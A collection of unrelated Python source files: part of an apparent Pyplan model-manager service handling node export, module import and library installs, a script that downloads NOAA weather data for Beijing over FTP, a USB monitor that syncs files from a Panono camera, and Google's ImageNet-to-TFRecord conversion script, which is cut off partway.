for node in nodes:
newZ = node.z
try:
self.setNodeProperties(node.id, [{"name": "z", "value": newZ}])
return True
except Exception as ex:
raise exceptions.NotAcceptable(
f"Error trying to set the node z property:{str(ex)}")
def setNodeIdFromTitle(self, node_id):
"""Sets the nodeId from its title"""
calcEngine = CalcEngine.factory(self.client_session)
new_id = calcEngine.setNodeIdFromTitle(node_id)
return new_id["node_id"]
def executeForRefresh(self):
"""Executes a node from the refresh button"""
value = random.randint(1, 10000000)
calcEngine = CalcEngine.factory(self.client_session)
calcEngine.setNodeProperties(
"pyplan_refresh", [{"name": "definition", "value": "result = " + str(value)}])
return calcEngine.setNodeProperties("cub_refresh", [{"name": "definition", "value": "result = " + str(value)}])
def exportFlatNode(self, exportData):
"""Export flat node to file"""
file_path = join(
settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')
identifier = self.getNodeProperties(
exportData.nodeId, [{"name": "identifier", "value": ""}])
original = identifier['properties'][0]['value']
calcEngine = CalcEngine.factory(self.client_session)
response = calcEngine.exportFlatNode(
original,
exportData.numberFormat,
exportData.columnFormat,
file_path
)
if response == 1:
if exportData.compressed == "1":
temp = tempfile.SpooledTemporaryFile()
with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:
zfobj.write(file_path)
for zfile in zfobj.filelist:
zfile.create_system = 0
temp.seek(0)
return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(".")]}.zip'
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
raise exceptions.NotAcceptable("Engine couldn't create file")
def exportCurrentNode(self, exportData, dashboardManagerService):
"""Export node (current table) to file"""
file_path = join(
settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')
identifier = self.getNodeProperties(
exportData.nodeId, [{"name": "identifier", "value": ""}])
original = identifier['properties'][0]['value']
decimalSep = "."
if exportData.columnFormat == 'tab':
exportData.columnFormat = '\t'
if exportData.numberFormat == 'TSPDSC':
decimalSep = ","
# ToDo: Don't call a service from a service
data = dashboardManagerService._evaluateNode(
original,
exportData.nodeQuery.dims,
exportData.nodeQuery.rows,
exportData.nodeQuery.columns,
exportData.nodeQuery.summaryBy,
0,
sys.maxsize,
exportData.nodeQuery.bottomTotal,
exportData.nodeQuery.rightTotal
)
with open(file_path, 'w') as f:
# first row
f.write(data.indexOnRow)
# column names
for cat in data.columns.categories:
f.write(exportData.columnFormat)
f.write(cat)
f.write('\n')
# data
for item in data.series:
f.write(str(item.name))
f.write(exportData.columnFormat)
for d in item.data:
f.write(str(d).replace(".", decimalSep) if isinstance(d, Number) else str(d))
f.write(exportData.columnFormat)
f.write('\n')
if exportData.compressed == "1":
temp = tempfile.SpooledTemporaryFile()
with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:
zfobj.write(file_path)
for zfile in zfobj.filelist:
zfile.create_system = 0
temp.seek(0)
return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(".")]}.zip'
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
def exportModuleToFile(self, exportData):
"""Export module to file"""
calcEngine = CalcEngine.factory(self.client_session)
file_path = join(settings.MEDIA_ROOT, 'tmp', f'{exportData.moduleId}.ppl')
if exportData.exportType != "1":
storage = FileSystemStorage(
join(settings.MEDIA_ROOT, 'models'))
currentPath = self.client_session.modelInfo.uri
folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]
file_path = join(
storage.base_location, folderPath, f'{exportData.moduleId}.ppl')
response = calcEngine.exportModule(exportData.moduleId, file_path)
if response == 1:
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
raise exceptions.NotAcceptable("Engine couldn't create file")
def importModuleFromFile(self, importModuleData):
"""Import module from file"""
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
currentPath = self.client_session.modelInfo.uri
importModuleData.currentModelPath = join(storage.base_location, currentPath)
fullFileName = join(settings.MEDIA_ROOT, 'tmp', importModuleData.moduleFile)
if not importModuleData.fromTemp:
fullFileName = join(storage.base_location, importModuleData.moduleFile)
if (importModuleData.importType.name == eImportType(0).name) or (importModuleData.importType.name == eImportType(2).name):
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.importModule(importModuleData.parentModelId,
fullFileName, str(importModuleData.importType.value))
if result:
importModuleData.importType = importModuleData.importType.value
if importModuleData.fromTemp:
os.remove(fullFileName)
return importModuleData
raise exceptions.NotAcceptable("Error importing module")
# TODO: implement eImportType(1).name (APPEND) case
raise exceptions.NotAcceptable("Import Type 'APPEND' not implemented")
def getFilesForImportWizard(self, extension):
"""
Get files for use in import wizard
"""
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
folderPath = self.client_session.modelInfo.uri[:self.client_session.modelInfo.uri.rfind(
os.path.sep)+1]
fullFolderPath = join(storage.base_location, folderPath)
return self._findFilesEntriesInFolderByExtension(fullFolderPath, f'.{extension}', True, [])
def callWizard(self, wizardRequest):
"""
Call toolbar wizard
"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.callWizard(wizardRequest)
def executeButton(self, nodeId):
"""
Execute script of button
"""
identifierPropertie = self.getNodeProperties(
nodeId, [{"name": "identifier", "value": ""}])
identifier = identifierPropertie['properties'][0]['value']
if self.existSession(self.client_session.session_key):
if not self.isInBackground(identifier):
# start new executeButtonThread
thread = threading.Thread(
target=self._executeButtonThread, args=[nodeId])
thread.daemon = True
thread.start()
# Node is already running in background
return True
raise exceptions.NotAcceptable(
"executeButton - There's no session")
def isInBackground(self, nodeId):
"""
Returns true if the node is executing in another thread
"""
identifierPropertie = self.getNodeProperties(
nodeId, [{"name": "identifier", "value": ""}])
identifier = identifierPropertie['properties'][0]['value']
if self.existSession(self.client_session.session_key):
return (self.client_session.modelInfo.nodeIdInBackground == identifier)
raise exceptions.NotAcceptable("isInBackground - There's no session")
def getSelector(self, node):
"""Return selector object definition"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.getSelector(node)
# helper functions
def uploadFile(self, action, my_file, folder_path, name, chunk):
return _uploadFile(action, my_file, folder_path, name, chunk, False)
def _removeDiacritics(self, text):
"""Removes all diacritic marks from the given string"""
norm_txt = unicodedata.normalize('NFD', text)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
# remove accents and other diacritics, replace spaces with "_" because identifiers can't have spaces
no_spaces = unicodedata.normalize(
'NFC', shaved).lower().replace(" ", "_")
final_text = no_spaces
# only allow [a-z], [0-9] and _
p = re.compile('[a-z0-9_]+')
for i in range(0, len(no_spaces)):
if not (p.match(no_spaces[i])):
final_text = final_text[:i] + '_' + final_text[i+1:]
# i the first char is not a-z then replaceit (all identifiers must start with a letter)
p2 = re.compile('[a-z]+')
if not p2.match(final_text[0]):
final_text = 'a' + final_text[1:]
return final_text
def _findFilesEntriesInFolderByExtension(self, path, extension, subFolders=True, pathList=[]):
""" Recursive function to find all files of an extension type in a folder (and optionally in all subfolders too) and returns them as file entries
path: Base directory to find files
pathList: A list that stores all paths
extension: File extension to find (example = txt)
subFolders: Bool. If True, find files in all subfolders under path. If False, only searches files in the specified folder
"""
try:
for entry in os.scandir(path):
if entry.is_file() and entry.path.endswith(extension):
fileStats = os.stat(entry.path)
# TODO: Revisar que siempre devuleve specialfolder type 0 aunque se trate de public o my folder etc.
# Esto estaba asi en .net pero es para revisar
fileEntry = FileEntry(
text=str(entry.path[entry.path.rfind(os.path.sep)+1:]),
type=eFileTypes.NOTHING,
data=FileEntryData(
# fullPath=entry.path,
fullPath=str(entry.path[entry.path.rfind(os.path.sep)+1:]),
fileSize=fileStats.st_size,
lastUpdateTime=datetime.datetime.fromtimestamp(
fileStats.st_mtime).isoformat()
)
)
pathList.append(fileEntry)
elif entry.is_dir() and subFolders: # if its a directory, then repeat process as a nested function
pathList = self._findFilesEntriesInFolderByExtension(
entry.path, extension, subFolders, pathList)
except OSError:
print('Cannot access ' + path + '. Probably a permissions error')
return pathList
def _executeButtonThread(self, identifier):
try:
"""
Dim thEngineUID As String = args(0)
Dim thRestClient As RestApiClient.RestClient = args(1)
Dim identifier As String = args(2)
Dim token As String = args(3)
Dim thCubengineManager As CubengineManager = args(4)
Dim nodeJSClient As NodeJsClient = args(5)
Dim modelData As Object = args(6)
"""
self.client_session.modelInfo.nodeIdInBackground = identifier
self.saveSession()
# TODO: Notify to nodejs that the thread has finished
# Dim message As Object = New System.Dynamic.ExpandoObject()
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.executeButton(identifier)
#message.error = False
#message.result = evalResult
# Notify to WebSocket channel that the thread has finished
sysMsg(
self.client_session.session_key,
ws_settings.MSG_TYPE_MESSAGE,
ws_settings.NOTIFICATION_LEVEL_SUCCESS,
content={
'title': 'Finished processing.',
'message': f'ID: {identifier}',
}
)
except Exception as ex:
error_msg = f'Error when performing execute button thread: {str(ex)}'
# Notify to WebSocket channel that the thread has finished with error
sysMsg(
self.client_session.session_key,
ws_settings.MSG_TYPE_MESSAGE,
ws_settings.NOTIFICATION_LEVEL_ERROR,
content={
'title': 'Finished processing with errors',
'message': error_msg,
}
)
raise exceptions.NotAcceptable(error_msg)
finally:
self.client_session.modelInfo.nodeIdInBackground = ''
self.saveSession()
def installLibrary(self, lib):
"""Install python library"""
calcEngine = CalcEngine.factory(self.client_session)
pos = self.client_session.modelInfo.uri.find("/", self.client_session.modelInfo.uri.find("/", 1)+1)
current_path = self.client_session.modelInfo.uri[:pos]
target_path = join(settings.MEDIA_ROOT, 'models', current_path)
result = calcEngine.installLibrary(lib, target_path)
return result
def listInstalledLibraries(self):
"""List python installed libraries"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.listInstalledLibraries()
return result
def uninstallLibrary(self, lib, target):
"""Uninstall python library"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.uninstallLibrary(lib, target)
return result
def getInstallProgress(self, from_line):
"""Get install python library progress"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getInstallProgress(from_line)
return result
|
get_beijing_weather.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
下载国家气象局所有气候数据 (VPN连接)
"""
import os
import re
import threading
from ftplib import FTP
from time import sleep
def ftp_get_data(tid, n, step):
# year: 1901 - 2017
# pattern = r"[12][09][0-9]{2}"
start = n
end = n + step - 1
if n == 1:
start = 0
pattern = "[12][09][{}-{}][0-9]".format(start, end)
print(pattern)
match_year = re.compile(pattern)
# 下载路径
# 采集站点编号: ftp://ftp.ncdc.noaa.gov/pub/data/noaa/isd-history.txt
output = "bj"
bj_id = "545110" # USAF
if not os.path.exists(output):
os.mkdir(output)
else:
print("{} is exists".format(output))
while True:
try:
with FTP() as ftp:
ftp.set_debuglevel(2)
ftp.connect("ftp.ncdc.noaa.gov", 21, 60)
ftp.login() # 匿名登录(user=anonymous, passwd='')
ftp.getwelcome()
ftp.cwd("pub/data/noaa/")
ftp.set_debuglevel(0)
files = ftp.nlst()
for name in files:
result = match_year.match(name)
if result is not None:
for gzfile in ftp.nlst(name):
print("[thread-{}] check {}".format(tid, gzfile))
ret = re.search(bj_id, gzfile)
if ret is None:
continue
year_dir = output + "/" + name
if not os.path.exists(year_dir):
os.mkdir(year_dir)
print("[thread-{}]Downloading:{} ".format(tid, gzfile))
outfile = output + "/" + gzfile
if os.path.exists(outfile):
continue
with open(outfile, 'wb') as f:
ftp.retrbinary("RETR " + gzfile, f.write, 2048)
# 下载气候文件格式说明文档
formatdoc = "ish-format-document.pdf"
doc = output + "/" + formatdoc
if not os.path.exists(doc):
with open(doc, "wb") as f:
ftp.retrbinary("RETR " + formatdoc, f.write, 1024)
break
except Exception as err:
print(err)
sleep(3)
if __name__ == "__main__":
# ftp 服务器最大允许2个线程访问
threads = []
step = 5
nloops = range(0, 9, step)
for i in nloops:
t = threading.Thread(target=ftp_get_data, args = (i, i, step))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
|
usb_monitor.py
|
import argparse
import logging
import pathlib
import threading
import time
import requests
import sh
import usb1
from sync import synchronize
MOUNT_POINT = "/tmp/mtp-mount"
log = logging.getLogger(__name__)
args = None
def _mount_device(device):
try:
product_name = device.getProduct()
except:
log.info("Unable to get product name of USB device, ignoring")
return
if not product_name or not product_name.startswith("Panono"):
return
log.info("Panono detected: %s", product_name)
tmpdirname = MOUNT_POINT
# Create mount directories if needed
tmpdir = pathlib.Path(tmpdirname)
tmpdir.mkdir(parents=True, exist_ok=True)
# Mount the device
mtp_process = sh.go_mtpfs("-android=false", tmpdirname, _bg=True)
log.info("Device mounted on: %s", tmpdirname)
time.sleep(1.5)
# Synchronize the files
synchronize(tmpdirname, args.destination, args.email, args.password)
# Unmount the device
time.sleep(1.0)
try:
mtp_process.terminate()
finally:
sh.sudo("umount", tmpdirname)
log.info("Device unmounted")
def hotplug_callback(context, device, event):
log.info("Device %s: %s" % (
{
usb1.HOTPLUG_EVENT_DEVICE_ARRIVED: 'arrived',
usb1.HOTPLUG_EVENT_DEVICE_LEFT: 'left',
}[event],
device,
))
# Note: cannot call synchronous API in this function.
if event == usb1.HOTPLUG_EVENT_DEVICE_ARRIVED:
thread = threading.Thread(target = _mount_device, args = (device, ))
thread.start()
def monitor_devices():
with usb1.USBContext() as context:
if not context.hasCapability(usb1.CAP_HAS_HOTPLUG):
log.error('Hotplug support is missing. Please update your libusb version.')
return
log.info('Registering hotplug callback...')
opaque = context.hotplugRegisterCallback(hotplug_callback)
log.info('Callback registered. Monitoring events, ^C to exit')
try:
while True:
context.handleEvents()
except (KeyboardInterrupt, SystemExit):
log.info('Exiting')
def _parse_arguments():
parser = argparse.ArgumentParser(description='Downloads UPF from the Panono.')
parser.add_argument('-e', '--email', dest="email", required=True, help='E-Mail used for loging in on panono.com')
parser.add_argument('-p', '--password', dest="password", required=True, help='Password used for loging in on panono.com')
parser.add_argument('destination', help='Storage directory')
return parser.parse_args()
def _init_logging():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
def main():
global args
_init_logging()
args = _parse_arguments()
monitor_devices()
if __name__ == '__main__':
main()
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
# import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
